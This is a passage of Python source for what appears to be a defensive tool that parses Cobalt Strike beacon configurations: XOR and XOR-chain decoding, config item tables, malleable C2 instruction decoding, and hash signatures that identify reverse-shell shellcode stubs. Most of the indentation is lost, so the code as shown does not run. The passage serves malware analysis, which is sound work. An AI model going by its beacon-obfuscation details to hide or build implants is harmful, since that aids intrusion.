def Filename(self, filename, index, total):
self.separateFilename = filename
if self.progress:
if index == 0:
eta = ''
else:
seconds = int(float((time.time() - self.starttime) / float(index)) * float(total - index))
eta = 'estimation %d seconds left, finished %s ' % (seconds, self.FormatTime(time.time() + seconds))
PrintError('%d/%d %s%s' % (index + 1, total, eta, self.separateFilename))
if self.separateFiles and self.filename != '':
oFilenameVariables = cVariables()
oFilenameVariables.SetVariable('f', self.separateFilename)
basename = os.path.basename(self.separateFilename)
oFilenameVariables.SetVariable('b', basename)
oFilenameVariables.SetVariable('d', os.path.dirname(self.separateFilename))
root, extension = os.path.splitext(basename)
oFilenameVariables.SetVariable('r', root)
oFilenameVariables.SetVariable('ru', self.RootUnique(root))
oFilenameVariables.SetVariable('e', extension)
self.Close()
self.fOut = open(oFilenameVariables.Instantiate(self.filename), 'w')
def Close(self):
if self.head and self.tail and len(self.tailQueue) > 0:
self.LineSub('...', '\n')
for line, eol in self.tailQueue:
self.LineSub(line, eol)
self.headCounter = 0
self.tailQueue = []
if self.fOut != None:
self.fOut.close()
self.fOut = None
def ToString(value):
if isinstance(value, str):
return value
else:
return str(value)
def Quote(value, separator, quote):
value = ToString(value)
if len(value) > 1 and value[0] == quote and value[-1] == quote:
return value
if separator in value or value == '':
return quote + value + quote
else:
return value
def MakeCSVLine(row, separator=',', quote='"'):
return separator.join([Quote(value, separator, quote) for value in row])
class cLogfile():
def __init__(self, keyword, comment):
self.starttime = time.time()
self.errors = 0
if keyword == '':
self.oOutput = None
else:
self.oOutput = cOutput('%s-%s-%s.log' % (os.path.splitext(os.path.basename(sys.argv[0]))[0], keyword, self.FormatTime()))
self.Line('Start')
self.Line('UTC', '%04d%02d%02d-%02d%02d%02d' % time.gmtime(time.time())[0:6])
self.Line('Comment', comment)
self.Line('Args', repr(sys.argv))
self.Line('Version', __version__)
self.Line('Python', repr(sys.version_info))
self.Line('Platform', sys.platform)
self.Line('CWD', repr(os.getcwd()))
@staticmethod
def FormatTime(epoch=None):
if epoch == None:
epoch = time.time()
return '%04d%02d%02d-%02d%02d%02d' % time.localtime(epoch)[0:6]
def Line(self, *line):
if self.oOutput != None:
self.oOutput.Line(MakeCSVLine((self.FormatTime(), ) + line, DEFAULT_SEPARATOR, QUOTE))
def LineError(self, *line):
self.Line('Error', *line)
self.errors += 1
def Close(self):
if self.oOutput != None:
self.Line('Finish', '%d error(s)' % self.errors, '%d second(s)' % (time.time() - self.starttime))
self.oOutput.Close()
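# CalculateByteStatistics returns, in this order: total byte count, entropy, number of unique
# byte values, null bytes, control bytes, whitespace bytes, printable bytes, high bytes
# (0x80-0xFF), hexadecimal-digit bytes, BASE64-character bytes, and the average absolute
# difference between consecutive byte values.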
def CalculateByteStatistics(dPrevalence=None, data=None):
averageConsecutiveByteDifference = None
if dPrevalence == None:
dPrevalence = {iter: 0 for iter in range(0x100)}
sumDifferences = 0.0
previous = None
if len(data) > 1:
for byte in data:
byte = C2IIP2(byte)
dPrevalence[byte] += 1
if previous != None:
sumDifferences += abs(byte - previous)
previous = byte
        averageConsecutiveByteDifference = sumDifferences / float(len(data) - 1)
sumValues = sum(dPrevalence.values())
countNullByte = dPrevalence[0]
countControlBytes = 0
countWhitespaceBytes = 0
countUniqueBytes = 0
for iter in range(1, 0x21):
if chr(iter) in string.whitespace:
countWhitespaceBytes += dPrevalence[iter]
else:
countControlBytes += dPrevalence[iter]
countControlBytes += dPrevalence[0x7F]
countPrintableBytes = 0
for iter in range(0x21, 0x7F):
countPrintableBytes += dPrevalence[iter]
countHighBytes = 0
for iter in range(0x80, 0x100):
countHighBytes += dPrevalence[iter]
countHexadecimalBytes = 0
countBASE64Bytes = 0
for iter in range(0x30, 0x3A):
countHexadecimalBytes += dPrevalence[iter]
countBASE64Bytes += dPrevalence[iter]
for iter in range(0x41, 0x47):
countHexadecimalBytes += dPrevalence[iter]
for iter in range(0x61, 0x67):
countHexadecimalBytes += dPrevalence[iter]
for iter in range(0x41, 0x5B):
countBASE64Bytes += dPrevalence[iter]
for iter in range(0x61, 0x7B):
countBASE64Bytes += dPrevalence[iter]
countBASE64Bytes += dPrevalence[ord('+')] + dPrevalence[ord('/')] + dPrevalence[ord('=')]
entropy = 0.0
for iter in range(0x100):
if dPrevalence[iter] > 0:
prevalence = float(dPrevalence[iter]) / float(sumValues)
entropy += - prevalence * math.log(prevalence, 2)
countUniqueBytes += 1
return sumValues, entropy, countUniqueBytes, countNullByte, countControlBytes, countWhitespaceBytes, countPrintableBytes, countHighBytes, countHexadecimalBytes, countBASE64Bytes, averageConsecutiveByteDifference
def GetChunk(position, data):
return [data[:position], data[position:]]
def InstantiateCOutput(options):
filenameOption = None
if options.output != '':
filenameOption = options.output
return cOutput(filenameOption)
class UnpackErrorNotEnoughData(Exception):
pass
def Unpack(format, data):
size = struct.calcsize(format)
if len(data) < size:
raise UnpackErrorNotEnoughData()
result = list(struct.unpack(format, data[:size]))
result.append(data[size:])
return result
def Represent(data):
if sum([ord(c) for c in data]) == 0:
return '(NULL ...)'
else:
return repr(data.rstrip('\x00'))
def PrefixIfNeeded(string, prefix=' '):
if string == '':
return string
else:
return prefix + string
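# Xor applies a repeating-key XOR: each byte of data is XORed with the corresponding byte of
# key (the key is repeated to cover the whole data) and the result is returned as bytes.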
def Xor(data, key):
data = C2SIP3(data)
key = C2SIP3(key)
return C2BIP3(''.join(chr(ord(data[i]) ^ ord(key[i % len(key)])) for i in range(len(data))))
def FindAll(data, sub):
result = []
start = 0
while True:
position = data.find(sub, start)
if position == -1:
return result
result.append(position)
start = position + 1
def FindAllList(data, searches):
result = []
for element in searches:
result.extend(FindAll(data, element))
return sorted(list(set(result)))
def DecodeSectionnameIfNeeded(name):
if len(name) == 0 or name.startswith('.'):
return name
xorkey = ord(name[0]) ^ ord('.')
newname = ''.join([chr(ord(c) ^ xorkey) for c in name]).rstrip('\x00')
return newname
def GetDataSection(data):
sectionnames = []
try:
oPE = pefile.PE(data=data)
except Exception as e:
return e.value, None
for section in oPE.sections:
if sys.version_info[0] >= 3:
sectionname = ''.join(filter(lambda c:c != '\0', str(section.Name.decode('unicode_escape'))))
else:
sectionname = ''.join(filter(lambda c:c != '\0', section.Name))
sectionnames.append(repr(sectionname))
if DecodeSectionnameIfNeeded(sectionname) == '.data':
return None, section.get_data()
return '.data section not found: ' + ' '.join(sectionnames), None
def GetXorChainSection(data):
try:
oPE = pefile.PE(data=data)
except Exception as e:
return None, e.value
for section in oPE.sections:
extracted, messages = TryXORChainDecoding(section.get_data())
if messages != []:
return extracted, messages
return None, None
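# StatisticalSearch scans the section data in 8-byte blocks and tracks the region where more
# than 2 bytes per block equal the XOR key (XOR-encoded zero bytes), a statistical indication
# of the encoded beacon configuration; it returns the start and end offsets of that region.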
def StatisticalSearch(payloadsectiondata, key):
start = None
end = None
position = 0
while len(payloadsectiondata) > 8:
block, payloadsectiondata = GetChunk(8, payloadsectiondata)
        if sum([IFF(c == key[0], 1, 0) for c in block]) > 2:  # key[0]: compare byte values, valid under both Python 2 and Python 3
if start == None:
start = position
end = position + 7
else:
end = position + 7
position += 8
return start, end
def Bytes2IPv4(data):
return '%d.%d.%d.%d' % (P23Ord(data[0]), P23Ord(data[1]), P23Ord(data[2]), P23Ord(data[3]))
def FindAF_INET_PORT(operand):
if P23Ord(operand[0]) != 2:
return ''
if P23Ord(operand[1]) != 0:
return ''
return '%d' % struct.unpack('>H', operand[2:4])[0]
def IdentifyShellcode(shellcode):
if hashlib.sha256(shellcode[:346]).hexdigest() == '946af5a23e5403ea1caccb2e0988ec1526b375a3e919189f16491eeabc3e7d8c':
return 'CS psexec psh x86 shellcode, opens named pipe'
elif hashlib.sha256(shellcode[:191]).hexdigest() == '02fd615831f5cc22d83ad681d33159d232afc3b18b69f647f1726280e2d7e3f3':
return 'CS reverse http x86 shellcode'
elif hashlib.sha256(shellcode[:271]).hexdigest() == 'bf413ba9b63b6777c4765581bf42c1fdb119f1ed22836cfaa80e616e2a3bf795':
return 'CS reverse http x64 shellcode'
elif hashlib.sha256(shellcode[:196]).hexdigest() == '52230666746fa8c9ec635083b05943d02bfe516fc45ea9c87eef300b9cd064e8':
return 'CS reverse https x86 shellcode'
elif hashlib.sha256(shellcode[:274]).hexdigest() == 'acffe4f9fd8f82044772627a4174f14abf873a8e783c31353bf094118f3c1706':
return 'CS reverse https x64 shellcode'
elif hashlib.sha256(shellcode[:330]).hexdigest() == 'a82872e2d839cd2ee1b0c2324b83f2686284ebe3eef5e9fb0c9e97db8d86cbf4':
return 'CS DNS x86 shellcode'
return ''
def AnalyzeShellcode(shellcode, oOutput):
dInstructions = {b'\x68': 'push', b'\xB8': 'mov eax'}
dJSONData = GetJSONData()
dLookupValues = dJSONData.get('dLookupValues', {})
identification = IdentifyShellcode(shellcode)
if identification != '':
oOutput.Line('Identification: %s' % identification)
position = shellcode.rfind(b'\xFF\xFF')
if position != -1:
parameters = shellcode[position+2:]
position00 = parameters.find(b'\x00')
remainder = b''
if position00 != -1:
remainder = parameters[position00 + 1:]
parameters = parameters[:position00]
oOutput.Line('Parameter: %d %s' % (position, repr(parameters)))
if len(remainder) == 4:
            licenseid = struct.unpack('>I', remainder)[0]
info = 'license-id: %d %d' % (position + position00 + 1, licenseid)
info += LookupValue("37", '%d' % licenseid, dLookupValues)
oOutput.Line(info)
for pushPosition in FindAllList(shellcode, dInstructions.keys()):
if pushPosition + 5 <= len(shellcode):
if position == -1:
operand = shellcode[pushPosition + 1:pushPosition + 5]
oOutput.Line('%-10s: %5d %10d %5s %-16s %s' % (dInstructions[shellcode[pushPosition:pushPosition+1]], pushPosition, struct.unpack('<I', operand)[0], FindAF_INET_PORT(operand), Bytes2IPv4(operand), repr(shellcode[pushPosition:pushPosition + 5])))
elif shellcode[pushPosition + 3:pushPosition + 5] == b'\x00\x00':
oOutput.Line('%-10s: %5d %10d %s' % (dInstructions[shellcode[pushPosition:pushPosition+1]], pushPosition, struct.unpack('<H', shellcode[pushPosition + 1:pushPosition + 3])[0], repr(shellcode[pushPosition:pushPosition + 5])))
    for stringFound in ExtractStringsASCII(shellcode):
        if (len(stringFound) == 5 and stringFound.startswith(b'/')) or stringFound.startswith(b'User-Agent: ') or stringFound.startswith(b'Mozilla/'):
            positions = FindAll(shellcode, stringFound)
            oOutput.Line('String: %s %s' % (','.join(['%d' % position for position in positions]), stringFound))
REGEX_STANDARD = b'[\x09\x20-\x7E]'
def ExtractStringsASCII(data):
regex = REGEX_STANDARD + b'{%d,}'
return re.findall(regex % 1, data)
def LookupConfigValue(id, value):
dConfigValues = {
0x0001: {
0: 'windows-beacon_http-reverse_http',
1: 'windows-beacon_dns-reverse_http',
            2: 'windows-beacon_smb-bind_pipe',
4: 'windows-beacon_tcp-reverse_tcp',
8: 'windows-beacon_https-reverse_https',
16: 'windows-beacon_tcp-bind_tcp',
32: 'to be determined',
},
0x0023: {
1: 'no proxy',
2: 'IE settings',
4: 'hardcoded proxy',
},
0x002b: {
0x01: 'PAGE_NOACCESS',
0x02: 'PAGE_READONLY',
0x04: 'PAGE_READWRITE',
0x08: 'PAGE_WRITECOPY',
0x10: 'PAGE_EXECUTE',
0x20: 'PAGE_EXECUTE_READ',
0x40: 'PAGE_EXECUTE_READWRITE',
0x80: 'PAGE_EXECUTE_WRITECOPY',
},
}
return PrefixIfNeeded(dConfigValues[id].get(value, ''))
def ConvertIntToIPv4(value):
return ' %d.%d.%d.%d' % (C2IIP2(value[0]), C2IIP2(value[1]), C2IIP2(value[2]), C2IIP2(value[3]))
def ToHexadecimal(value):
if isinstance(value, int):
return '%x' % value
else:
return binascii.b2a_hex(value).decode()
def LookupValue(number, value, dInfo, verbose=False):
lookup = ''
if number in dInfo:
lookup = dInfo[number].get(value, '')
if isinstance(lookup, dict):
message = lookup['normal']
if verbose:
message += ' (%s)' % lookup['verbose']
lookup = message
return PrefixIfNeeded(lookup)
def InterpretValue(info, number, value, dConfigValueInterpreter):
interpreted = ''
if number in dConfigValueInterpreter:
interpreted = dConfigValueInterpreter[number](value)
return info + interpreted
def GetScriptPath():
if getattr(sys, 'frozen', False):
return os.path.dirname(sys.executable)
else:
return os.path.dirname(sys.argv[0])
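# DetermineCSVersionFromConfig guesses the Cobalt Strike version from the highest config item
# ID present in the extracted configuration and returns a (version, maximumID) tuple.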
def DetermineCSVersionFromConfig(dJSON):
maximumID = max(map(int, dJSON.keys()))
if maximumID < 55:
return ('3', maximumID)
elif maximumID == 55:
return ('4.0', maximumID)
elif maximumID > 55 and maximumID < 58:
return ('4.1', maximumID)
elif maximumID == 58:
return ('4.2', maximumID)
elif maximumID == 70:
return ('4.3', maximumID)
else:
return ('4.4', maximumID)
def SanityCheckExtractedConfig(dJSON):
if not 1 in dJSON:
return False
if not 7 in dJSON:
return False
if LookupConfigValue(1, dJSON[1]['rawvalue']) == '':
return False
if not isinstance(dJSON[7]['rawvalue'], str):
return False
if not dJSON[7]['rawvalue'].startswith('308'):
return False
return True
def GetJSONData():
filename = os.path.join(GetScriptPath(), '1768b.json')
if os.path.isfile(filename):
return json.load(open(filename, 'r'))
filename = os.path.join(GetScriptPath(), '1768.json')
if os.path.isfile(filename):
return json.load(open(filename, 'r'))
return {}
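# cStruct is a small helper that consumes a bytes buffer sequentially: Unpack reads values
# according to a struct format, GetBytes reads raw bytes, and GetString reads a string whose
# length is prefixed in the given struct format.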
class cStruct(object):
def __init__(self, data):
self.data = data
self.originaldata = data
def Unpack(self, format):
formatsize = struct.calcsize(format)
if len(self.data) < formatsize:
raise Exception('Not enough data')
tounpack = self.data[:formatsize]
self.data = self.data[formatsize:]
result = struct.unpack(format, tounpack)
if len(result) == 1:
return result[0]
else:
return result
def Truncate(self, length):
self.data = self.data[:length]
def GetBytes(self, length=None):
if length == None:
length = len(self.data)
result = self.data[:length]
self.data = self.data[length:]
return result
def GetString(self, format):
stringLength = self.Unpack(format)
return self.GetBytes(stringLength)
def Length(self):
return len(self.data)
# https://www.usualsuspect.re/article/cobalt-strikes-malleable-c2-under-the-hood
INSTRUCTION_TYPE_MALLEABLE_C2 = 1
INSTRUCTION_TYPE_GET = 2
INSTRUCTION_TYPE_POST = 3
INSTRUCTION_NONE = 0
INSTRUCTION_APPEND = 1
INSTRUCTION_PREPEND = 2
INSTRUCTION_BASE64 = 3
INSTRUCTION_PRINT = 4
INSTRUCTION_PARAMETER = 5
INSTRUCTION_HEADER = 6
INSTRUCTION_BUILD = 7
INSTRUCTION_NETBIOS = 8
INSTRUCTION_CONST_PARAMETER = 9
INSTRUCTION_CONST_HEADER = 10
INSTRUCTION_NETBIOSU = 11
INSTRUCTION_URI_APPEND = 12
INSTRUCTION_BASE64URL = 13
INSTRUCTION_STRREP = 14
INSTRUCTION_MASK = 15
INSTRUCTION_CONST_HOST_HEADER = 16
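# DecodeInstructions parses a malleable C2 data-transform program: a sequence of big-endian
# 32-bit opcodes (constants above), some followed by a 32-bit length-prefixed string operand.
# It returns two lists (human-readable instructions and raw opcodes), with the steps following
# a Build opcode grouped together until the block is terminated.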
def DecodeInstructions(value, instructionsType):
oStruct = cStruct(value)
instructions = []
opcodes = []
buildFlag = False
while oStruct.Length() >= 4:
opcode = oStruct.Unpack('>I')
if buildFlag and opcode in [0, 6, 7, 10, 16]:
instructions.append('Build End')
opcodes.append(['7', 'End'])
buildFlag = False
if opcode == INSTRUCTION_NONE:
break
if opcode == INSTRUCTION_APPEND:
if instructionsType == INSTRUCTION_TYPE_MALLEABLE_C2:
operand = oStruct.Unpack('>I')
instructions.append('Remove %d bytes from end' % operand)
opcodes.append([str(opcode), str(operand)])
else:
operand = oStruct.GetString('>I').decode('latin')
instructions.append('Append %s' % operand)
opcodes.append([str(opcode), operand])
elif opcode == INSTRUCTION_PREPEND:
if instructionsType == INSTRUCTION_TYPE_MALLEABLE_C2:
operand = oStruct.Unpack('>I')
instructions.append('Remove %d bytes from begin' % operand)
opcodes.append([str(opcode), str(operand)])
else:
operand = oStruct.GetString('>I').decode('latin')
instructions.append('Prepend %s' % operand)
opcodes.append([str(opcode), operand])
elif opcode == INSTRUCTION_BASE64:
instructions.append('BASE64')
opcodes.append([str(opcode)])
elif opcode == INSTRUCTION_PRINT:
instructions.append('Print')
opcodes.append([str(opcode)])
elif opcode == INSTRUCTION_PARAMETER:
operand = oStruct.GetString('>I').decode('latin')
instructions.append('Parameter %s' % operand)
opcodes.append([str(opcode), operand])
elif opcode == INSTRUCTION_HEADER:
operand = oStruct.GetString('>I').decode('latin')
instructions.append('Header %s' % operand)
opcodes.append([str(opcode), operand])
elif opcode == INSTRUCTION_BUILD:
buildFlag = True
operand = oStruct.Unpack('>I')
if instructionsType == INSTRUCTION_TYPE_POST:
if operand == 0:
operand = 'SessionId'
else:
operand = 'Output'
else:
operand = 'Metadata'
instructions.append('Build %s' % operand)
opcodes.append([str(opcode), operand])
elif opcode == INSTRUCTION_NETBIOS:
instructions.append('NETBIOS lowercase')
opcodes.append([str(opcode)])
elif opcode == INSTRUCTION_CONST_PARAMETER:
operand = oStruct.GetString('>I').decode('latin')
instructions.append('Const_parameter %s' % operand)
opcodes.append([str(opcode), operand])
elif opcode == INSTRUCTION_CONST_HEADER:
operand = oStruct.GetString('>I').decode('latin')
instructions.append('Const_header %s' % operand)
opcodes.append([str(opcode), operand])
elif opcode == INSTRUCTION_NETBIOSU:
instructions.append('NETBIOS uppercase')
opcodes.append([str(opcode)])
elif opcode == INSTRUCTION_URI_APPEND:
instructions.append('Uri_append')
opcodes.append([str(opcode)])
elif opcode == INSTRUCTION_BASE64URL:
instructions.append('BASE64 URL')
opcodes.append([str(opcode)])
elif opcode == INSTRUCTION_STRREP:
operand1 = oStruct.GetString('>I').decode('latin')
operand2 = oStruct.GetString('>I').decode('latin')
instructions.append('STRREP %s %s' % (operand1, operand2))
opcodes.append([str(opcode), operand1, operand2])
elif opcode == INSTRUCTION_MASK:
instructions.append('XOR with 4-byte random key')
opcodes.append([str(opcode)])
elif opcode == INSTRUCTION_CONST_HOST_HEADER:
operand = oStruct.GetString('>I').decode('latin')
instructions.append('Const_host_header %s' % operand)
opcodes.append([str(opcode), operand])
else:
instructions.append('Unknown instruction: 0x%02x' % opcode)
opcodes.append([str(opcode)])
result = []
buildFlag = False
for instruction in instructions:
if instruction == 'Build End':
result.append(build)
elif instruction.startswith('Build '):
build = [instruction]
            buildFlag = True
elif buildFlag:
build.append(instruction)
else:
result.append(instruction)
instructions = result
result = []
buildFlag = False
for opcode in opcodes:
if opcode == ['7', 'End']:
result.append(build)
elif opcode[0] == '7':
build = [opcode]
            buildFlag = True
elif buildFlag:
build.append(opcode)
else:
result.append(opcode)
opcodes = result
if instructionsType == INSTRUCTION_TYPE_MALLEABLE_C2:
instructions = [['Transform Input'] + instructions]
opcodes = [[['7', 'Input']] + opcodes]
return [instructions, opcodes]
def DecodeMalleableC2Instructions(parameter):
instructions, opcodes = DecodeInstructions(parameter, INSTRUCTION_TYPE_MALLEABLE_C2)
buildOpcodes = ','.join([item for opcode in opcodes for item in opcode])
return 'Instructions: ' + ','.join(instructions) + ' [7,Input,' + buildOpcodes + ']'
def AnalyzeEmbeddedPEFileSub(payloadsectiondata, options):
result = []
if options.xorkeys:
for xorKey in range(256):
xorKeyBytes = bytes([xorKey])
startConfigXored = Xor(START_CONFIG, xorKeyBytes)
for position in FindAll(payloadsectiondata, startConfigXored):
result, dJSON = AnalyzeEmbeddedPEFileSub2(Xor(payloadsectiondata[position:position+0x10000], xorKeyBytes), result, options)
if result != [ERROR_SANITY_CHECK]:
return result, dJSON
return [result, {}]
xorKey = b'i'
config, startconfig, endconfig = CutData(Xor(payloadsectiondata, xorKey), '[000100010002]:')
if len(config) == 0:
xorKey = b'.'
config, startconfig, endconfig = CutData(Xor(payloadsectiondata, xorKey), '[000100010002]:')
if len(config) == 0:
xorKey = b'i'
startconfig, endconfig = StatisticalSearch(payloadsectiondata, xorKey)
if startconfig == None:
xorKey = b'.'
startconfig, endconfig = StatisticalSearch(payloadsectiondata, xorKey)
if startconfig == None:
result.append(ERROR_NO_CONFIG)
return [result, {}]
else:
result.append('Config found (statistical): xorkey %s 0x%08x 0x%08x' % (xorKey, startconfig, endconfig))
result.append(cDump(Xor(payloadsectiondata[startconfig:endconfig + 1], xorKey)).HexAsciiDump(rle=True))
return [result, {}]
# result.append('Config found: 0x%08x 0x%08x %s' % (startconfig, endconfig, ' '.join(['0x%08x' % position for position in FindAll(payloadsectiondata, '\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF')])))
# result.append('Config found: 0x%08x 0x%08x %s' % (startconfig, endconfig, ' '.join(['0x%08x' % position for position in FindAll(payloadsectiondata, '\x90\x01\x00\x00')])))
result.append('Config found: xorkey %s 0x%08x 0x%08x' % (xorKey, startconfig, endconfig))
data = config
return AnalyzeEmbeddedPEFileSub2(data, result, options)
def AnalyzeEmbeddedPEFileSub2(data, result, options):
dJSON = {}
dConfigIdentifiers = {
0x0001: 'payload type',
0x0002: 'port',
0x0003: 'sleeptime',
0x0004: 'maxgetsize', #
0x0005: 'jitter',
0x0006: 'maxdns',
0x0007: 'publickey',
0x0008: 'server,get-uri',
0x0009: 'useragent',
0x000a: 'post-uri',
0x000b: 'Malleable_C2_Instructions', #
0x000c: 'http_get_header',
0x000d: 'http_post_header',
0x000e: 'SpawnTo', #
0x000f: 'pipename',
0x0010: 'killdate_year', #
0x0011: 'killdate_month', #
0x0012: 'killdate_day', #
0x0013: 'DNS_Idle', #
0x0014: 'DNS_Sleep', #
0x0015: 'SSH_HOST', #
0x0016: 'SSH_PORT', #
0x0017: 'SSH_USER-NAME', #
0x0018: 'SSH_PASSWORD', #
0x0019: 'SSH_PUBKEY', #
0x001a: 'get-verb',
0x001b: 'post-verb',
0x001c: 'HttpPostChunk', #
0x001d: 'spawnto_x86',
0x001e: 'spawnto_x64',
0x001f: 'CryptoScheme', #
0x0020: 'proxy',
0x0021: 'proxy_username',
0x0022: 'proxy_password',
0x0023: 'proxy_type',
0x0024: 'deprecated', #
0x0025: 'license-id',
0x0026: 'bStageCleanup', #
0x0027: 'bCFGCaution', #
0x0028: 'killdate',
0x0029: 'textSectionEnd', #
0x002a: 'ObfuscateSectionsInfo', #
0x002b: 'process-inject-start-rwx',
0x002c: 'process-inject-use-rwx',
0x002d: 'process-inject-min_alloc',
0x002e: 'process-inject-transform-x86',
0x002f: 'process-inject-transform-x64',
0x0030: 'DEPRECATED_PROCINJ_ALLOWED',
0x0031: 'BIND_HOST',
0x0032: 'UsesCookies',
0x0033: 'process-inject-execute',
0x0034: 'process-inject-allocation-method',
0x0035: 'process-inject-stub',
0x0036: 'HostHeader',
0x0037: 'EXIT_FUNK',
0x0038: 'SSH_BANNER',
0x0039: 'SMB_FRAME_HEADER',
0x003a: 'TCP_FRAME_HEADER',
0x003b: 'HEADERS_TO_REMOVE',
0x003c: 'DNS_beacon',
0x003d: 'DNS_A',
0x003e: 'DNS_AAAA',
0x003f: 'DNS_TXT',
0x0040: 'DNS_metadata',
0x0041: 'DNS_output',
0x0042: 'DNS_resolver',
0x0043: 'DNS_STRATEGY',
0x0044: 'DNS_STRATEGY_ROTATE_SECONDS',
0x0045: 'DNS_STRATEGY_FAIL_X',
0x0046: 'DNS_STRATEGY_FAIL_SECONDS',
0x0047: 'MAX_RETRY_STRATEGY_ATTEMPTS',
0x0048: 'MAX_RETRY_STRATEGY_INCREASE',
0x0049: 'MAX_RETRY_STRATEGY_DURATION',
}
dConfigValueInterpreter = {
0x0001: lambda value: LookupConfigValue(0x0001, value),
0x0007: ToHexadecimal,
0x000b: DecodeMalleableC2Instructions,
0x0013: ConvertIntToIPv4,
0x0023: lambda value: LookupConfigValue(0x0023, value),
0x002b: lambda value: LookupConfigValue(0x002b, value),
0x002c: lambda value: LookupConfigValue(0x002b, value),
}
dJSONData = GetJSONData()
dLookupValues = dJSONData.get('dLookupValues', {})
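    # the configuration is a sequence of entries: 2-byte big-endian item number, 2-byte type,
    # 2-byte length, followed by <length> bytes of value; an item number of 0 terminates the list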
while len(data) >= 2:
formatNumber = '>H'
formatTypeLength = '>HH'
ntlBytes = data[0:struct.calcsize(formatNumber) + struct.calcsize(formatTypeLength)]
try:
number, data = Unpack(formatNumber, data)
except UnpackErrorNotEnoughData:
break
if number == 0:
result.append('0x%04x' % number)
break
try:
type, length, data = Unpack(formatTypeLength, data)
except UnpackErrorNotEnoughData:
break
parameter, data = GetChunk(length, data)
info = ''
rawvalue = None
if type == 1 and length == 2:
identifier = struct.unpack('>H', parameter)[0]
rawvalue = identifier
info = InterpretValue('%d' % identifier, number, identifier, dConfigValueInterpreter)
elif type == 2 and length == 4:
if number in [0x44, 0x45, 0x46]:
rawvalue = struct.unpack('>i', parameter)[0]
else:
rawvalue = struct.unpack('>I', parameter)[0]
value = '%d' % rawvalue
info = InterpretValue(value, number, parameter[0:4], dConfigValueInterpreter)
info += LookupValue(str(number), value, dLookupValues, options.verbose)
elif type == 3 and not number in [0x0b, 0x0c, 0x0d]:
info = InterpretValue('', number, parameter, dConfigValueInterpreter)
rawvalue = binascii.b2a_hex(parameter).decode()
if info == '':
info = Represent(C2SIP3(parameter))
info += LookupValue(str(number), rawvalue, dLookupValues, options.verbose)
resultNumber = '0x%04x' % number
resultType = '0x%04x' % type
resultLength = '0x%04x' % length
resultID = dConfigIdentifiers.get(number, '')
dJSON[number] = {'id': resultID, 'type': resultType, 'info': info, 'rawvalue': rawvalue}
if options.csv:
result.append(MakeCSVLine((resultNumber, resultID, resultType, resultLength, info)))
else:
resultID = ('%-' + str(max([len(value) for value in dConfigIdentifiers.values()])) + 's') % resultID
result.append('%s %s %s %s%s' % (resultNumber, resultID, resultType, resultLength, PrefixIfNeeded(info)))
if type == 3 and number in [0x0b, 0x0c, 0x0d]:
instructions, opcodes = DecodeInstructions(parameter, {0x0b: INSTRUCTION_TYPE_MALLEABLE_C2, 0x0c: INSTRUCTION_TYPE_GET, 0x0d: INSTRUCTION_TYPE_POST}[number])
for index, instruction in enumerate(instructions):
if isinstance(instruction, str):
if options.csv:
result.append(MakeCSVLine(('', '', '', '', instruction)))
else:
result.append(' %s' % instruction)
else:
buildOpcodes = ','.join([':'.join(opcode) for opcode in opcodes[index]])
if number in dJSON:
if dJSON[number]['info'] == '':
dJSON[number]['info'] = buildOpcodes
else:
dJSON[number]['info'] += ';' + buildOpcodes
else:
dJSON[number] = {'id': resultID, 'type': resultType, 'info': buildOpcodes, 'rawvalue': binascii.b2a_hex(parameter).decode()}
if options.csv:
result.append(MakeCSVLine(('', '', '', '', '%s:[%s]' % (instruction[0], buildOpcodes))))
else:
result.append(' %s: [%s]' % (instruction[0], buildOpcodes))
for buildStep in instruction[1:]:
if options.csv:
result.append(MakeCSVLine(('', '', '', '', buildStep)))
else:
result.append(' %s' % buildStep)
# for string in ExtractStringsASCII(parameter):
# if options.csv:
# result.append(MakeCSVLine(('', '', '', '', string.decode('utf8', 'surrogateescape')), ',', '"'))
# else:
# result.append(' %s' % string.decode('utf8', 'surrogateescape'))
if options.select != '':
select = ParseInteger(options.select)
if number == select:
result.append(' Decoded: %s' % ToHexadecimal(ntlBytes + parameter))
result.append(" 'i'-encoded: %s" % ToHexadecimal(Xor(ntlBytes + parameter, b'i')))
result.append(" '.'-encoded: %s" % ToHexadecimal(Xor(ntlBytes + parameter, b'.')))
result.append('Guessing Cobalt Strike version: %s (max 0x%04x)' % DetermineCSVersionFromConfig(dJSON))
sanityCheck = SanityCheckExtractedConfig(dJSON)
result.append('Sanity check Cobalt Strike config: %s' % ('OK' if sanityCheck else 'NOK'))
if options.sanitycheck and not sanityCheck:
return [[ERROR_SANITY_CHECK], {}]
return [result, dJSON]
def AnalyzeEmbeddedPEFile(payloadsectiondata, oOutput, options):
result, dJSON = AnalyzeEmbeddedPEFileSub(payloadsectiondata, options)
oOutput.JSON(dJSON)
for line in result:
oOutput.Line(line)
def DetectPEFile(data):
if len(data) < 40:
return False
if data[0:2] != b'MZ':
return False
offsetbytes = data[0x3C:0x3C + 4]
if len(offsetbytes) != 4:
return False
offset = struct.unpack('<I', offsetbytes)[0]
if data[offset:offset + 2] != b'PE':
return False
return True
def StripLeadingNOPs(data):
return data.lstrip(b'\x90')
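# XOR chain encoding: the data is a sequence of little-endian 32-bit words, each XORed with the
# previous encoded word; the first word is XORed with the key. XORChainSlow and XORChainFast
# implement the same decoding; TryXORChainDecoding brute-forces the start offset and reads the
# key and length pair that precede the encoded payload.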
def XORChainSlow(iKey, encodedData):
decodedData = b''
xorkey = iKey
while len(encodedData) >= 4:
encoded = struct.unpack('<I', encodedData[0:4])[0]
decodedData += struct.pack('<I', encoded ^ xorkey)
xorkey = encoded
encodedData = encodedData[4:]
return decodedData
def XORChainFast(iKey, encodedData):
oDATA = DataIO()
xorkey = iKey
index = 0
format = '<I'
formatLength = struct.calcsize(format)
while True:
bytesInteger = encodedData[index:index + formatLength]
if len(bytesInteger) != formatLength:
break
encoded = struct.unpack(format, bytesInteger)[0]
oDATA.write(struct.pack(format, encoded ^ xorkey))
xorkey = encoded
index += formatLength
return oDATA.getvalue()
def XORChain(iKey, encodedData):
    fast = XORChainFast(iKey, encodedData)
    return fast
    # note: the code below is unreachable because of the early return above;
    # it compares the fast and slow implementations and can be re-enabled for debugging
    slow = XORChainSlow(iKey, encodedData)
    if slow != fast:
        raise Exception('slow != fast')
    return fast
def TryXORChainDecoding(data):
if len(data) < 0x100:
return data, []
formatstring = '<II'
formatLength = struct.calcsize(formatstring)
startLength = 16
for iIter in range(1, 0x1000):
bytesValues = data[iIter:iIter + formatLength + startLength]
if len(bytesValues) != formatLength + startLength:
return data, []
xorKey, xorEncodedLength = struct.unpack(formatstring, bytesValues[:formatLength])
decodedLength = xorKey ^ xorEncodedLength
